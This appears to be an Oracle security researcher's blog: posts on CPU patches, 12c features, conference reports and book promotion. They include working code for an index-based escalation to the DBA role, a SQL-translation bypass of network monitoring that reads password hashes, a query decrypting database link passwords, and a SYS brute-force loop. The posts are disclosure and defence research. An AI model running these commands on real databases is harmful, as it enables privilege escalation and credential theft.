Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed

April 2014 CPU

Hi Oracle Security Folks,

Thanks to Oracle for fixing a batch of research I sent over in August 2013 regarding ADVISOR, DIRECTORIES, GAOP(GRANT ANY OBJECT PRIVILEGE) and also a critical privilege escalation which gains 8.5 in the CPU which I am not going to publish here as I want to give folks time to patch. Both of the issues fixed in the April DB Patch are from me this time.

Note that that the CVSS 8.5 was not discussed at any conferences – it’s new. Actually the CVSS 8.5 is detailed in my new book which has just come out after the patch release, and is available from Apress and Amazon There is some new exploit research in there but the main thrust of the book is Defense and Protection – especially using Enterprise Manager/Cloud Control to Defend an estate and how to secure privileged access control mechanisms such as breakglass. I am very honored that Jonathan Gennick Edited the book, Arup Nanda Technically Reviewed the book, and that Slavik Markovich – CTO of McAfee – wrote a kind foreword to the book as well. There have also been quite a few other folks involved whom I list in the Acknowledgements section. It’s taken a year to write so hopefully you will like it.

Anyhow more detail to come on that in the future. For now I recommend installing the patch and reading the book…though it has to be said – that was where I was 9 months ago..and the world has not stopped spinning yet…Global SCN still rising :) but hopefully no maximum in sight yet!

Keep safe,


Hello Oracle Security Readers,

If we combine the following factors together then we can identify an escalation route from Index on SYSTEM to SYSDBA which does not require SELECT privileges on the indexed table:

1. SYSTEM passes it’s DBA role through it’s procedures.

2. Oracle indexes allow execution from read via functions i.e. INDEX can execute a function.

3. Oracle analyses indexes before they are used.

The PoC code is below:



create user test identified by o; 
grant create session, create procedure, create any index to test; 

SQL*Plus: Release Production on Wed Dec 11 09:47:26 2013 
Copyright (c) 1982, 2010, Oracle.  All rights reserved. 
Connected to: 
Oracle Database 11g Enterprise Edition Release - Production 
With the Partitioning, OLAP, Data Mining and Real Application Testing options 

SQL> conn test/o 

/  2    3    4    5    6    7    8   
Function created. 

SQL> grant execute on test.y to public; 
Grant succeeded. 

SQL> create index system.escalation_index on system.SQLPLUS_PRODUCT_PROFILE(test.y('name')); 
Index created. 

SQL> set role dba;  
Role set.

So the ability to create an index can lead to SYSDBA. Oracle have made the above more difficult to achieve in 12c by adding an INHERIT privilege requirement which blocks the above code, and therefore represents another good reason to upgrade from 11g to 12c. I discuss this in my new book along with other issues, for publication in April, and already available to purchase in Alpha format at this URL

What sort of defences have organisations been using recently to combat attacks like the above? Surprisingly there has still been a large focus on network monitoring to implement DB Security. I say surprisingly because new DB Sec research has been focused for a while on controlling internal high privilege within the DB. A privileged account can bypass network monitoring even if it is host based. A good example of bypassing a host based network monitor (e.g. SNORT/Guardium et al) is the dbms_sql_translator package introduced with 12c demonstrated below:

conn / as sysdba

SQL> exec dbms_sql_translator.create_profile('BYPASSNETMON');

PL/SQL procedure successfully completed.

SQL> select object_name, object_type from dba_objects where object_name like 'BYPASSNETMON';


SQL> exec dbms_sql_translator.register_sql_translation('BYPASSNETMON','select username from dba_users','select user, password from sys.user$')

PL/SQL procedure successfully completed.

SQL> alter session set sql_translation_profile = BYPASSNETMON;

Session altered.

SQL> alter session set events = '10601 trace name context forever, level 32';

Session altered.

SQL> select username from dba_users;




To achieve this monitoring bypass all that is required is CREATE SQL TRANSLATION PROFILE privilege and ALTER SESSION. Gaining ALTER SESSION has been achievable, as my previous book showed

And there are other methods to gain ALTER SESSION in newer versions of Oracle DB, and the CREATE SQL TRANSLATION PROFILE privilege is only needed at creation time, so verifying that a session is not being translated surreptitiously requires some expertise. More to come on this.

Ready made methods to alert to the unauthorised use of dbms_sql_translator are the native audit trail, or for high security scenarios a memory monitor such McAfee’s DB Sec monitoring tool here provides high protection

There are positives from a security perspective in 12c, and of course with Oracle we can add our own defenses. The new book adds these following protections among others:

  1. Incoming DB Link blocking using Native IPS
  2. Forensic rootkit detection
  3. Break-glass Access Control security
  4. Automated statechecking from root
  5. Adaptive security response using EM12c
  6. Fine grained user management
  7. Centralised audit trail lifecycle
  8. Vulnerability scanning for verification using Perl
  9. Securing privileged access control
  10. 12c decryptions and defenses

Anyway I won’t spoil the surprise – so enjoy your weekends!


Paul M. Wright

P.S. Commenting works now as the Maths Captcha plugin has dealt with the spambots


Hi Guys,

OOW was the trip of a lifetime. Watching Oracle USA win the cup with Ben Ainslie was great, as was watching Larry’s keynote live. Columnar in memory DB looks interesting and competition for Hana.

I presented at the excellent Delphix event with OakTable, and picked up some good information to finalise some more book chapters.

It was good to meet Steven Karam as we had a discussion about ALTER USER IDENTIFIED BY VALUES bypassing account expiry. This is a security loophole in my experience, as it will enable legacy app account owners to avoid renewing their passwords if the Prod DBA expires them.

Off to Hacktivity tomorrow in Hungary to give a talk there on Friday 11th October at 12.40pm

I will discuss some of the 12c research which is going into the book, which includes new privilege escalations and a new solution to block all incoming database links, which I am quite pleased with.

More details at hacktivity. See you there!

P.S. Amazon is taking pre-orders I note

OOW and Oak Table

Hi Oracle Security Readers,
OOW is here again and I will be giving a short “In a nutshell” presentation on 12c security which will include – 3 good and 3 not so good points about 12c, as well as future research directions. 
The presentation will be at Table World
This can be regarded as a short taster for the upcoming book.

You know 12c does have some good features e.g. Definer Roles for Program Units, which works well, and has the potential to solve the majority of privilege escalations by removing the need for PUBLIC. Also TCPS is free on all DB versions now which is really great. Lots of work needed to test this upgrade integrates with other servers..

However there are some serious issues with GA as a release, and also some design weaknesses that need to be borne in mind when implementing 12c. Additionally some of the issues found whilst testing 12c do port back to which is a concern now.

I will be discussing the defenses to some of these issues in my Oak Table Presentation, and then later at Hacktivity in October So OOW will get the defenses first!

Look forward to seeing you in San Francisco. Lastly I am in the process of transitioning general Oracle Security posts to www.OracleSecurity.Com which is hosted in the US.



Hi Oracle Security Folks,

Yes indeed, 12c is out. I have been working on 12c for 1.5 years and gave the first external 12c security presentation (of which I am aware) at UKOUG 2012 in Birmingham, so it is good to see that the product has finally been released. I like that the consolidation features are optional now. A lot of the currently unpublished 12c security research will be going into my Apress book Protecting Oracle (12c), due out in November, but I will be able to give some tasters here as we progress..

Firstly, thank you to Dani Schnider of Trivadis for referencing my Database Link Security paper.
Dani’s paper is available at this URL and here in English translated by Google. Dani describes the idea of limiting a DB link to a specific account and then adding a context variable to legitimate DB Link logins using that account, which can then be used by the receiving database to grant access or not, using a trigger which checks for the correct context variable.

v_username VARCHAR2(30) := sys_context('USERENV','SESSION_USER');
v_dbl_info VARCHAR2(200) := sys_context('USERENV','DBLINK_INFO');
IF v_username = 'ETL_USER' THEN
IF v_dbl_info IS NULL THEN
write_log('failed: direct login', v_username, v_dbl_info);
raise_application_error(-20101, 'Direct login not allowed.');
write_log('failed: wrong dblink', v_username, v_dbl_info);
raise_application_error(-20102, 'Login from wrong database link not allowed.');
write_log('successful login', v_username, v_dbl_info);
END dbl_logon_trg;

This is good advice but does not attempt to address the wider issue of how to stop incoming links for all accounts. That is more complex needing “Native Intrusion Protection”…more to come on this in the book.

My DB Link paper was also picked up by, and is nice to see Oracle openly discussing vulnerability. Mr A.C Hobbs would approve.

Gary Myers also kindly added observations regarding the transportation of a database link from one DB to another (as discussed on oracle-l). This feature still works in below — though the ciphertext is longer now..


Database link created.

SQL> SELECT DBMS_METADATA.GET_DDL('DB_LINK',a.db_link,a.owner) FROM dba_db_links a;



SQL> select * from v$version;

Oracle Database 11g Enterprise Edition Release - 64bit Production
PL/SQL Release - Production
CORE      Production
TNS for 64-bit Windows: Version - Production
NLSRTL Version - Production

In my experience having possession of a copy of the ciphertext to create a copy of the link has a much lower impact than gaining the plaintext. Problem is that the plaintext password for low priv dblinks are often the same to the other system accounts.

Of course database links have completely changed how the encryption algorithm works –> it is the same method as 12c. More on this in the book, in November.
May be a good idea to reset those DB Link passwords to unique values. 11.2 and above allows you to alter the password of the dblink directly with this command, another improvement from Oracle.

ALTER DATABASE LINK private_link CONNECT TO hr IDENTIFIED BY hr_new_password;

Database Links are interesting, but in terms of relative risk, the issue of remote SYS brute forcing has caused more concern than any other, partly due to the inability to mitigate. You will probably remember my , SYS connection throttler which was a DIY mitigation to remote brute forcing issue documented in 2007 (Needs FFox)

Well here is some very good news as Oracle have implemented my recommendation, given before and during the Beta, to add a simple hidden parameter to slow down remote SYS brute forcing – and it is set to TRUE by default!

Introducing _sys_logon_delay (beams proudly at new parameter).

This addresses one of the biggest security concerns and I commend Oracle for following my recommendations. The point of this simple delay function is that users will be able to understand it and therefore use it confidently.

while true;do sqlplus -S -L sys/wrongpw@orlin:1521/orcl3 as sysdba;sleep 0;done;

ORA-01017: invalid username/password; logon denied
8< --- Slow steady pace between failed logons thus making remote brute force infeasible.

--can set to 0 to disable, or to higher value to slow down attacker, but needs a restart.
--e.g. alter system set "_sys_logon_delay"=0 scope=spfile;

SQL> select banner from v$version;

Oracle Database 12c Enterprise Edition Release - 64bit Production
PL/SQL Release - Production
CORE      Production
TNS for Linux: Version - Production
NLSRTL Version - Production

Lets have a look and see what the new parameter looks like

SQL> select a.ksppinm name, b.ksppstvl value,b.ksppstdf deflt,
decode (a.ksppity, 1,
'boolean', 2,
'string', 3,
'number', 4,
'file', a.ksppity) type, a.ksppdesc description
sys.x$ksppi a,
sys.x$ksppcv b
where   a.indx = b.indx
a.ksppinm ='_sys_logon_delay';  2    3    4    5    6    7    8    9   10   11   12  

--------- ----------------------------------------
TRUE	  number
failed logon delay for sys

It is satisfying to see a large company react positively to customer feedback and to have helped fix this problem. Thanks to everyone involved. There are of course many other problems to solve, as we shall see in due course.

Lastly, courtesy of Oracle/Apress I will be at OOW/JavaOne in September, taking part in a publishing seminar, and looking forward to seeing you there in sunny SF.


Another Java Security Alert

Hi Oracle Security Folks,

Following the tradition for one off Java Security Alerts
Oracle Critical Patch Updates and Security Alerts:

Oracle Security Alert for CVE-2013-1493:

The reporters say it is an unreliable exploit. Of course it depends on Java being used in the browser so one fix is to unplug the JVM from the browser.

For the past ten years I have only used Java as a server side technology,, where it is actually making leaps and bounds. I had the pleasure of taking an Oracle Professional Training class on Java 7 new features recently and there are some very nice concurrency features that make separating and delegating tasks a lot easier to accomplish. This has made Java the predominant language of choice for Universities, and also increased the usage of Netbeans IDE which I have found to be more stable than Eclipse and certainly better for writing JDBC applications. My point is that I think the technologists at Oracle are actually doing quite a good job with Java…back to the DB now in prep for 12c..excitement mounts..


Oracle Dictionary Integrity Health Check


It is good to check the integrity or health of a system to avoid future problems.

DBMS_HM.RUN_CHECK(‘Dictionary Integrity Check’, ‘my_run’);

SET LONG 100000



Basic Run Information
Run Name : my_run
Run Id : 141
Check Name : Dictionary Integrity Check
Start Time : 2013-02-10 13:46:11.861572 +00:00
End Time : 2013-02-10 13:50:43.713326 +00:00
Error Encountered : 0
Source Incident Id : 0
Number of Incidents Created : 0

Input Paramters for the Run

Run Findings And Recommendations
Finding Name : Dictionary Inconsistency
Finding ID : 142
Status : OPEN
Priority : CRITICAL
Message : SQL dictionary health check: file$ pk 42 on object FILE$
Message : Damaged rowid is AAAAARAABAAAADpAAC – description: Filename
/home/oracle/app/oracle/oradata/orcl/pdbseed/system01.dbf is

Crikey – lots of output – but what does it all mean?

SQL> SELECT AVG(dbms_utility.get_hash_value(text,1000000000,power(2,30))) FROM DBA_SOURCE WHERE OWNER=’SYS’;

Ahh my dictionary is same as before…cool

SQL> select banner from v$version;

Oracle Database 12c Enterprise Edition Release – 64bit Beta
PL/SQL Release – Beta
TNS for Linux: Version – Beta
NLSRTL Version – Beta


Java Security Alert

New Year – New vulnerabilities…yes it’s alert season again, with the main patch out on the 15th, but an out of band alert today for the Java 0 day. It is good to see Oracle taking this well publicised issue so seriously.

Here is the alert –

For an excellent advanced analysis please see this verified pdf

For a more layman’s overview of Java Security this pdf is useful

I taught the first publicly available Java Security Course outside of the US in 2007 at SANS London, and wrote the first Java Security exam (GSSP), and wrote and presented the first “Java Top 10 Security issues” in Orlando 2008 – which is still very relevant – and back then the story was the same as it is today… — Java applets are insecure – don’t use them – and strongly consider turning off Java in browsers.
Server-side Java is still a dominant language and probably will be for a while, though Java in the Database itself has had both security and performance issues…as well as questions as to why use Java in the DB – is it to bring more processing to the DB to increase licensing for Oracle, say the cynics, OR to enable less network transactions between app and db pulling data backwards and forwards? Obviously it is nice to have a choice, but PL is a more efficient way to interact with the DB locally.
A larger question in many folks minds will be why use Java at all? It was made popular because Sun had made it cross-platform, but does Oracle have the same cross-platform credibility as Sun? A JVM is slower than native so if x-platform is less of a factor perhaps C will make a comeback. This logic is borne out by Personally, I do a lot of text file log manipulation so I still use Perl as it is quicker (and have been recommended to try LUA – on the todos), and am intrigued by DBIx
Agreed, for database connectivity JDBC is still king, so I am still glad I learnt Java at uni many moons ago, but the crux to this is that Java’s expansion market has been Android and the fear is that Oracle’s lawyers scare companies from innovating with the technology in a cross-platform like way. I hope the concept of “Java Stewardship” extends to the legal department.

Anyway, lets hope that the new Oracle patch is reliable.

Keep safe,

UKOUG 2012 in a nutshell

Hi Oracle Security Folks,

UKOUG 2012 in a nutshell:

OAK Table day highlight was Julian’s analysis of RAT capture formats, which made reverse engineering proprietory formats look a lot easier than it should do. Christian’s super secret talk was so secret that it was not given, but managed to catch up on that later.

Monday my presentation was suprisingly full up (Ok it was a small room), and no one fell asleep or ran screaming so that classifies it as successful in my book. The slides are on UKOUG’s web site but require a logon. In truth the talk went very well and the audience genuinely seemed to appreciate the hard work I had put in, and the contribution made by Co-speaker Philip Weedon.

Afterwards, I wandered over to Grant Allen’s Talk. Grant made contributions from Unix perspective including how to log bash commands to syslog (cool) and re-iterated the benefits of centralising audit trail. Had a chat after and started the post talk celebrations which resulted in going to bed at breakfast time. So that’s why they call it “Bed and Breakfast”. The rest of the two days should be annotated with the fact that it took me approximately two days to recover from the Monday night, but it was worth it as had some very interesting talks about how DBA privilege is actually managed – in practise – which is different from the typical Identity Management perspective…more to come on this..

Tuesday was a later start and helped Pete with the Oracle Security Roundtable which was well attended with lively discussion.
Then Tom’s 12c talk which had some security perspectives. Tom’s presentation skills are second to none and he interacted with Hall 1 audience very naturally. What we know is there are a lot of new features for security in 12c as well a lot of extra products that can be purchased to enhance the security of the database.
Conversely I think the actual core security of the central product has been degraded in some ways. For instance password complexity, account locking, password history, failed login throttling etc are no longer effective on SYS in 11 upwards..and many of the OraSec “experts” and DBA Managers are not aware of this because they are bombarded with extraneous information about extra addons which do not cure the core weaknesses.
I published sys_throttler to address this but a full solution is not we can say that Oracle Security is not solved yet.

After Tom we headed to Gregory’s Identity Management talk which was a good overview of how to use OVD to manage DB users, and highlighted that Oracle can unexpectedly support two seperate authentication mechanisms for one user (ref Pete), which is something I also alluded to in

Identity Management of lower privileged accounts in Oracle is a good thing, but it certainly becomes more difficult once the users are privileged as they can break the chains that bind them….hence the requirement for a comp balance like auditing..

Pete’s Wednesday 9 AM talk on audit trails, was a bit cloudy in my mind first time round, but reading the slides now they are making sense.
Pete showed using client_identifier as central identity through core audit…excellent battle worn advice.
Also discussed identifying sql injections and killing the session automatically…but difficult for a session to kill itself. This would be handy when trying to automatically defend against an attack. Obviously it is possible to call out to the OS but within the DB this is not so easy…work to do again.
Also Pete mentioned using a trigger to enable core audit to save on performance.
A lot of this changes in 12c but the concepts were very interesting…
Pete then transferred to DBA access control mode and described how the power of the DBA can be controlled through individual proxy users proxying to a core dba role which is customised. This is a good strategy for BAU. The problem is of course that to carry out imports/exports and user management the ALTER USER privilege is needed and any user with this or execute on dbms_sys_sql etc can act as a different user so it is not a solution for highest privilege.
Breakglass and time-based access control is the way forward for taming the top dog privileges in my view/experience…though splitting SYSDBA into seperate system privileges goes towards taming SYS e.g. SYSBACKUP and SYSAUD et al.

Pythian were prominent with some interesting work on Human reliability and Privileged Access Monitoring. Absolute applications were busy with their training offerings and DSP had 6 presentations so the vendor element looked healthy.

I would have liked to have gone to…
-Guido Schmutz’s NoSQL presentation but the PDF reads well.
-Carl Dudley’s Audit trail presentation was thorough and of immediate practicable use in 11g.
-Owen Ireland’s Goldengate presentation is an excellent quick start intro for DBA.
-Hitachi’s Muthukumar did a detailed presentation on localisation in Oracle for EU.
-Portix’s Bjorn Rost did an informative presentation on Total Recall listing the virtual columns and AS OF syntax.
Of course there are loads others, these are just the presentations that caught my eye.

The general opinion was that the conference was better than last year. I can’t vouch for that as I wasn’t there last year due to work commitments, but I certainly enjoyed catching up with old friends. Next year I am informed the conference for DB will be in Manchester which is the home of my MSc CS department, Mr Turing, and some of the best music to grace our charts, as well as a special breed of mega pub (ref Moon Under the Water), though the Lass O’ Gowrie aims for quality rather than quantity. In short Manchester is literally a cool place and thankfully still serviced by Virgin trains, so see you there next year.

Thank you to all the excellent presenters this year who have increased my understanding yet again.
It is interesting to see how California’s Oracle User group compares


SYS Security

Hello Folks,

A few people have told me that they thought only SYS could select db link passwords.
Truth is any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well.

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view;


If missing execute on dbms_crypto then may need to copy over the ciphertext to another DB under the control of the attacker.

ku$_dblink_view select from SELECT_CATALOG_ROLE is fixed in and above, as is the “stealth password cracking vulnerability” which has gained a lot of attention, and resulted in updates to John and Ettercap.

So which account would be the likely target of this stealth attack? …
The only account that is guaranteed to be present and unlocked is SYS..
For both the stealth brute force and my orabrute style brute force the primary defence is the strength of the SYS password.
If the SYS password is a 15 character passphrase that is changed regularly then the attacks are ineffective. So how to ensure SYS password is complex and the account is secure?
Problem is SYS is immune to profiles in 11g, so no password history, no account locking, and no failed logon delay and crucially no password complexity function.
The SYS password could be ‘a’ and no-one else would be the wiser.

[oracle@localhost ~]$ sqlplus sys/lowsec@localhost/orcl as sysdba

SQL*Plus: Release Production on Wed Nov 28 20:40:57 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> alter user sys identified by a;

User altered.

SQL> alter user system identified by a;
alter user system identified by a
ERROR at line 1:
ORA-28003: password verification for the specified password failed
ORA-20001: Password length less than 8

The DBA might not even realise the password is ‘a’ if they are coming in through Unix ” / as sysdba “.
SYS can even silently turn off it’s own audit through oradebug so no record of the attack either.

So SYS really is “special”, but will this improve in 12c…? Answers at UKOUG.